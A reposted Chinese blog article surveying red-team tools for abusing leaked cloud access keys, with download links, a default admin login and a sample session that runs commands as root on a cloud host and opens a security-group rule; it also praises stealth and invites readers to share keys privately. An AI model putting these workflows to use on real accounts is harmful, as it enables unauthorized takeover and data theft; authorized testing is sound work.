文章总结: 文档介绍了红队云渗透中AK/SK利用工具,推荐全能框架CF、AWS专用Pacu、轻量枚举LC、可视化管理CloudSec及容器工具CDK。针对权限验证、资产盘点、命令执行等场景给出选型建议,强调工具的自动化与隐蔽性优势,同时提示操作日志风险并重申法律合规要求。 综合评分: 86 文章分类: 云安全,红队,渗透测试,安全工具
【云安全专题-3】红队御用的 AK/SK 利用与云渗透神兵
原创
Ca1m
FunnyHacking
2026年1月10日 07:05 上海
在云安全攻防(特别是红队行动)中,单纯依赖云厂商的官方 CLI 工具(如 aws cli 或 aliyun-cli)效率极低,且容易暴露痕迹。红队工具的价值在于:自动化、隐蔽性、跨平台集成。
前言
当你辛辛苦苦通过前端 JS 挖掘、代码审计或钓鱼拿到了一对 AK/SK (Access Key / Secret Key) 后,下一步该干什么?
手搓官方 CLI?那太慢了。不仅安装繁琐,还可能因为错误的 User-Agent 触发风控告警。 专业的云安全研究员,都有自己的“云上军火库”。这些工具能帮我们在几秒钟内完成权限验证、资产枚举、一键接管、甚至命令执行。
本章,我们将盘点目前市面上最主流的云安全攻防工具,助你从“手工作坊”升级为“自动化流水线”。
01 综合利用框架:云端的 Metasploit
这类工具集成了“枚举-利用-持久化”的全流程,是红队的首选。
👑 王者:CF (Cloud Exploitation Framework)
-
• 开发者:TeamSSix
-
• 定位:国内最好用的多云利用框架,没有之一。
-
• 核心优势:
-
• 全覆盖:支持 AWS、阿里云、腾讯云、华为云、百度云等几乎所有主流厂商。
-
• 红队视角:它不是简单的 API 包装,而是内置了大量攻击手法。例如
cf alibaba ecs exec可以一键在阿里云 ECS 上执行命令,无需复杂的参数配置。 -
• 权限枚举:输入 AK/SK,自动跑一遍
Permissions,告诉你这个 Key 到底能干嘛(是只能读 S3,还是能重启服务器)。 -
• 适用场景:拿到 Key 后的第一手标准操作。
⚔️ 鼻祖:Pacu (AWS Exploitation Framework)
-
• 开发者:Rhino Security Labs
-
• 定位:AWS 攻防领域的绝对标准,类似于 Metasploit。
-
• 核心优势:
-
• 模块化:拥有数十个攻击模块(如 Lambda 后门植入、S3 勒索、IAM 提权)。
-
• AWS 深度:对 AWS 的理解极深,能挖掘出很多逻辑复杂的攻击路径。
-
• 适用场景:专门针对 AWS 环境的深度渗透。
02 快速资产枚举:云端的 Nmap
拿到 Key 后,我们最想知道的是:这个账号下到底有多少台服务器?有多少个存储桶?
🚀 急先锋:LC (List Cloud)
-
• 开发者:LioTree
-
• 定位:极致轻量化的多云资产枚举工具。
-
• 核心优势:
-
• 单文件:Go 语言编写,一个二进制文件走天下,无需 Python 环境。
-
• 速度快:并发查询,瞬间列出账号下的 ECS、RDS、OSS 等资产 ID 和区域。
-
• 适用场景:快速摸底。当你不知道这个 Key 属于哪个项目时,用 LC 跑一下,全景图就出来了。
🔍 照妖镜:CloudSword (云鉴)
-
• 定位:自动化云环境风险评估与资产发现。
-
• 核心优势:
-
• 不仅能列出资产,还能自动检测一些明显的配置错误(如安全组 22 端口开放)。
-
• 支持导出详细的 HTML 报告,方便做汇报或分析。
03 图形化管理 (C2):云上的“远控木马”
命令行虽然帅,但浏览文件和管理多账号时不直观。这时候 GUI 工具就派上用场了。
🖥️ 指挥官:CloudSec
-
• 开发者:libaibaia
-
• 定位:基于 Web 视角的云资产接管系统。
-
• 核心优势:
-
• 所见即所得:采用了类似“菜刀/蚁剑”的 UI 设计。
-
• 文件管理:直接像浏览网盘一样浏览 S3/OSS 中的文件,支持右键下载、上传、删除。这比敲命令行
aws s3 cp直观太多。 -
• 命令执行:提供了 Web 版的终端,可以直接对云主机执行 shell 命令。
-
• 适用场景:后渗透阶段的持久化管理,或者需要从存储桶中翻找大量敏感文件时。
04 特种作战:云原生与容器
🐳 容器刺客:CDK (Container Datacenter Knife)
-
• 定位:容器环境下的渗透神器。
-
• 核心优势:
-
• 虽然它主打 K8s 和 Docker 逃逸,但在云攻防中,AK/SK 往往是在容器的环境变量中发现的。
-
• CDK 集成了大量针对云厂商容器服务(如阿里云 ACK、AWS EKS)的探测模块,能帮你在拿到容器 Shell 后,进一步向云控制面横向移动。
📝 工具选型指南:我该用哪个?
| 场景 | 推荐工具 | 理由 | | — | — | — | | 刚拿到 AK/SK,想看权限 | CF | 一键查询,精准快速。 | | 想看账号下有多少资产 | LC (List Cloud) | 速度最快,输出简洁,适合做资产盘点。 | | 需要对云主机执行命令 | CF / CloudSec | CF 适合命令行操作,CloudSec 适合交互式 Shell。 | | 想翻 S3 桶里的文件 | CloudSec | 图形化界面,浏览效率最高。 | | 针对 AWS 的深度攻防 | Pacu | 模块最全,专业性最强。 |
结语
工具只是手段,思维才是核心。
这些工具极大降低了云安全的门槛,但也请记住:工具发出的每一个 API 请求,都会在云厂商的 CloudTrail/ActionTrail 中留下不可磨灭的日志。
🚨【重要法律声明】
本文介绍的安全工具和技术仅限于授权的安全测试、企业内部风险自查或学术研究。
严禁使用本文中的工具或技术攻击任何非授权的云端资产、服务器或网络环境。
依据《中华人民共和国刑法》第 285 条、286 条,非法侵入计算机信息系统、非法获取计算机信息系统数据均属犯罪行为。
工具本身不具备攻击性,关键在于使用者的意图。使用本文提到的技术即表示您已充分理解风险,并承诺仅用于合法用途。若因非法使用产生任何法律纠纷,概与本文作者无关。
工具下载地址和使用手册:
cloudSec
云安全利用工具-云平台AK/SK-WEB利用工具,添加AK/SK自动检测资源,无需手动执行,支持云服务器、存储桶、数据库操作
https://github.com/libaibaia/cloudSec
启动后端java -jar cloudSec.jar
访问nginx80或者8000端口登录,默认账号密码admin/admin123。
CF
CF 是一个云环境利用框架,适用于在红队场景中对云上内网进行横向、SRC 场景中对 Access Key 即访问凭证的影响程度进行判定、企业场景中对自己的云上资产进行自检等等。
https://github.com/Phuong39/cf/
使用手册:https://wiki.teamssix.com/CF/
云鉴
一款帮助云租户发现和测试云上风险、增强云上防护能力的综合性开源工具
https://github.com/wgpsec/cloudsword
使用手册:https://wiki.teamssix.com/cloudsword/
LC(List Cloud)多云攻击面资产梳理工具
https://github.com/wgpsec/lc
文档和学习资料:
https://wiki.teamssix.com/lc/
aksk_tool
AK资源管理工具,阿里云/腾讯云/华为云/AWS/UCLOUD/京东云/百度云/七牛云存储/火山引擎 AccessKey AccessKeySecret,利用AK获取资源信息和操作资源,ECS/CVM/E2/UHOST/ECI/BCC执行命令,OSS/COS/S3/BOS管理,RDS/DB管理,域名管理,添加RAM/CAM/IAM账号等
https://github.com/wyzxxz/aksk_tool
因为缺少各云厂商AK以及各个云的产品权限,部分功能未进行完整测试,如遇到问题和BUG,可提ISSUES,也鼓励大家私聊提供一些AK测试以及完善更多功能。
download_url : https://share.feijipan.com/s/5FFQgrO1 或 https://pan.baidu.com/s/1iWCcnIL6XGSs1GKSWrxiPA 提取码: 79yh
部分优化
> java -jar aksk_tool.jar
[-] Usage: java -jar aksk_tool.jar ak sk
[-] Usage: java -jar aksk_tool.jar ak sk token
[-] Usage: java -jar aksk_tool.jar ak sk region=xxx 指定地域
[-] Usage: java -jar aksk_tool.jar ak sk product=oss,cos 指定产品
[-] Usage: java -jar aksk_tool.jar ak sk region=xxx product=oss,cos 指定地域和产品
[-] qiniu Usage: java -jar aksk_tool.jar ak sk bucket_name bucket_url
目前支持 阿里云,腾讯云,华为云,AWS,UCLOUD, 京东云,七牛云存储, 百度云,火山引擎
阿里云
支持 AKSK认证,STS认证
支持 ECS, OSS, RDS, REDIS, RAM , DOAIM 的功能调用
1. ECS ECS详情查询,命令执行,安全组添加/删除
2. OSS OSS文件上传,下载,删除,查询
3. RDS RDS详情查询,数据库账号添加/删除,IP白名单修改
4. REDIS REDIS详情查询,密码修改
5. RAM RAM账号添加/删除, 新增/删除AK
6. DOMAIN DOMAIN域名查询,子域名解析增删改查等
7. ECI ECI容器增删,以及命令执行
腾讯云
支持 AKSK认证,TOKEN认证
支持 CVM, DOAIM, COS 的功能调用
1. CVM CVM详情查询,实例启动,关闭,密码重置,命令执行(需要安装Agent)
2. DOMAIN DOMAIN域名查询
3. COS COS文件存储,文件的增删改查和临时url生成
4. CDB CDB数据库账号操作,增删改查等
5. CAM 账号(包含AK)增删改查
华为云
支持 AKSK认证,TOKEN认证
支持 ECS, RDS, IAM 的功能调用
1. ECS CVM详情查询,密码重置,安全组操作
2. RDS RDS实例查询
3. IAM 账户查询,新增AK,用户组用户增删改查
AWS
支持 AKSK认证
支持 E2, S3, IAM 的功能调用
UCLOUD
支持 AKSK认证
支持 UHOST, UDB, UFILE 的功能调用
京东云
支持 AKSK认证
支持 CVM, OSS, RDS , AK管理 的功能调用
百度云
支持 AKSK认证
支持 BCC, BOS, RDS IAM 的功能调用
火山引擎
支持 AKSK认证,TOKEN认证
支持 ECS, RDS, TOS, IAM 的功能调用
七牛云存储
支持 AKSK认证
> qiniu Usage: java -jar aksk_tool.jar ak sk bucket_name bucket_url
$java -jar aksk_tool.jar LTAI******* aaaaaaaaaaaaaaaaaaaaaaaa
$java -jar aksk_tool.jar STS.AAI******* aaaaaaaaaaaaaaaaaaaaaaaa TOKENASDASDSADSADASDSAADADSADSA
[-] AK: LTAI******* SK: aaaaaaaaaaaaaaaaaaaaaaaa
> account name: wyzxxz
> account uid: 100000000000000
> account cash: 999999999999999999999
[-] regions list:
| Num | Region_Id | Region_Name |
| 1 | cn-qingdao | 华北1(青岛) |
| 2 | cn-beijing | 华北2(北京) |
| 3 | cn-zhangjiakou | 华北3(张家口) |
| 4 | cn-huhehaote | 华北5(呼和浩特) |
| 5 | cn-wulanchabu | 华北6(乌兰察布) |
| 6 | cn-hangzhou | 华东1(杭州) |
| 7 | cn-shanghai | 华东2(上海) |
| 8 | cn-shenzhen | 华南1(深圳) |
| 9 | cn-heyuan | 华南2(河源) |
| 10 | cn-guangzhou | 华南3(广州) |
| 11 | cn-chengdu | 西南1(成都) |
| 12 | cn-hongkong | 中国(香港) |
| 13 | ap-northeast-1 | 亚太东北 1 (东京) |
| 14 | ap-southeast-1 | 亚太东南 1 (新加坡) |
| 15 | ap-southeast-2 | 亚太东南 2 (悉尼) |
| 16 | ap-southeast-3 | 亚太东南 3 (吉隆坡) |
| 17 | ap-southeast-5 | 亚太东南 5 (雅加达) |
| 18 | ap-south-1 | 亚太南部 1 (孟买) |
| 19 | us-east-1 | 美国东部 1 (弗吉尼亚) |
| 20 | us-west-1 | 美国西部 1 (硅谷) |
| 21 | eu-west-1 | 英国 (伦敦) |
| 22 | me-east-1 | 中东东部 1 (迪拜) |
| 23 | eu-central-1 | 欧洲中部 1 (法兰克福) |
| 24 | cn-nanjing | 华东5(南京-本地地域) |
[-] search Resource:
INFO > cn-qingdao - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-beijing - ECS: 1 - MYSQL: 3 - SQLServer: 0 - PostgreSQL: 1 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-zhangjiakou - ECS: 1 - MYSQL: 1 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-huhehaote - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-wulanchabu - ECS: 0 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-hangzhou - ECS: 1 - MYSQL: 1 - SQLServer: 0 - PostgreSQL: 1 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-shanghai - ECS: 1 - MYSQL: 1 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-shenzhen - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 1 - OSS_BUCKET: 1
INFO > cn-heyuan - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-guangzhou - ECS: 0 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-chengdu - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-hongkong - ECS: 1 - MYSQL: 1 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > ap-northeast-1 - ECS: 2 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > ap-southeast-1 - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > ap-southeast-2 - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > ap-southeast-3 - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > ap-southeast-5 - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > ap-south-1 - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > us-east-1 - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > us-west-1 - ECS: 4 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > eu-west-1 - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > me-east-1 - ECS: 1 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > eu-central-1 - ECS: 2 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
INFO > cn-nanjing - ECS: 0 - MYSQL: 0 - SQLServer: 0 - PostgreSQL: 0 - REDIS: 0 - OSS_BUCKET: 1
[-] find regions list:
0: cn-qingdao --> ECS: 1 MYSQL: 1
1: cn-beijing --> ECS: 10 MYSQL: 1 REDIS: 2
2: cn-zhangjiakou --> ECS: 1 MYSQL: 1
3: cn-huhehaote --> ECS: 1
4: cn-hangzhou --> ECS: 1 MYSQL: 1 REDIS: 1
5: cn-shanghai --> ECS: 1 MYSQL: 1
6: cn-shenzhen --> ECS: 1
7: cn-heyuan --> ECS: 1
8: cn-chengdu --> ECS: 1
9: cn-hongkong --> ECS: 1 MYSQL: 1
10: ap-northeast-1 --> ECS: 1
11: ap-southeast-1 --> ECS: 1
12: ap-southeast-2 --> ECS: 1
13: ap-southeast-3 --> ECS: 1
14: ap-southeast-5 --> ECS: 1
15: ap-south-1 --> ECS: 1
16: us-east-1 --> ECS: 1
17: us-west-1 --> ECS: 4
18: eu-west-1 --> ECS: 1
19: me-east-1 --> ECS: 1
20: eu-central-1 --> ECS: 1
[-] please enter the number(0-20)
> 0
[-] use region: cn-qingdao
[-] use region: cn-qingdao
[-] please choose product:
1. ECS
2. OSS
3. RDS
4. REDIS
5. RAM
6. DOMAIN
> 1
[-] Instance list:
| Num | Instance_ID | Public_IP | CPU | Memory | Instance_Status | OS_Name | Instance_Name | Security_Group |
| 1 | i-test | 1.1.1.1 | 4 | 16G | Running | Ubuntu 18.04 64位 | test-qingdao-01 | sg-secgroupid |
[-] find instance list:
0: i-test,test-qingdao-01
[-] please enter the number(0-0), enter back to re-choose region
> 0
[-] use instance: i-test,test-qingdao-01
[-] Instance Detail:
# Os name: Ubuntu 18.04 64位
# Hostname: test-qingdao-01
# RegionId: cn-qingdao
# Instance Id: i-testname
# Instance Name: i-test
# InnerIp:
# Public Ip: 1.1.1.1
# Security GroupId: sg-secgroupid
# Start Time: 2011-01-04T12:36Z
# Expired Time: 2023-01-02T12:00Z
# CPU: 4
# Memory: 16384 M
# Status: Running
# Disk size: 150 G
[-] please enter command, enter q or quit to quit, enter back to re-choose instance
[-] example: cmd=whoami sec_group_info=SecruityGroupId sec_group_add=SecruityGroupId:ip sec_group_del=SecruityGroupId:ip
> sec_group_info=sg-secgroupid
[-] Security Group Detail:
# Protocol: TCP, Ip:0.0.0.0/0, PortRange:3389/3389, SourceRange:, Policy:Drop, NicType:intranet, CreatTime:2011-01-02T09:17:10Z
# Protocol: TCP, Ip:0.0.0.0/0, PortRange:3389/3389, SourceRange:, Policy:Accept, NicType:intranet, CreatTime:2011-01-02T09:17:10Z
# Protocol: ICMP, Ip:0.0.0.0/0, PortRange:-1/-1, SourceRange:-1/-1, Policy:Accept, NicType:intranet, CreatTime:2011-01-02T09:17:09Z
# Protocol: TCP, Ip:0.0.0.0/0, PortRange:22/22, SourceRange:, Policy:Accept, NicType:intranet, CreatTime:2011-01-02T09:17:09Z
[-] please enter command, enter q or quit to quit, enter back to re-choose instance
[-] example: cmd=whoami sec_group_info=SecruityGroupId sec_group_add=SecruityGroupId:ip sec_group_del=SecruityGroupId:ip
> cmd=whoami
[-] command: whoami
命令创建完成
命令执行完成
root
[-] please enter command, enter q or quit to quit, enter back to re-choose instance
[-] example: cmd=whoami sec_group_info=SecruityGroupId sec_group_add=SecruityGroupId:ip sec_group_del=SecruityGroupId:ip
> sec_group_add=sg-secgroupid:8.8.8.8
入方向安全组新增成功
[-] please enter command, enter q or quit to quit, enter back to re-choose instance
[-] example: cmd=whoami sec_group_info=SecruityGroupId sec_group_add=SecruityGroupId:ip sec_group_del=SecruityGroupId:ip
> q
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:FunnyHacking Ca1m《【云安全专题-3】红队御用的 AK/SK 利用与云渗透神兵》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论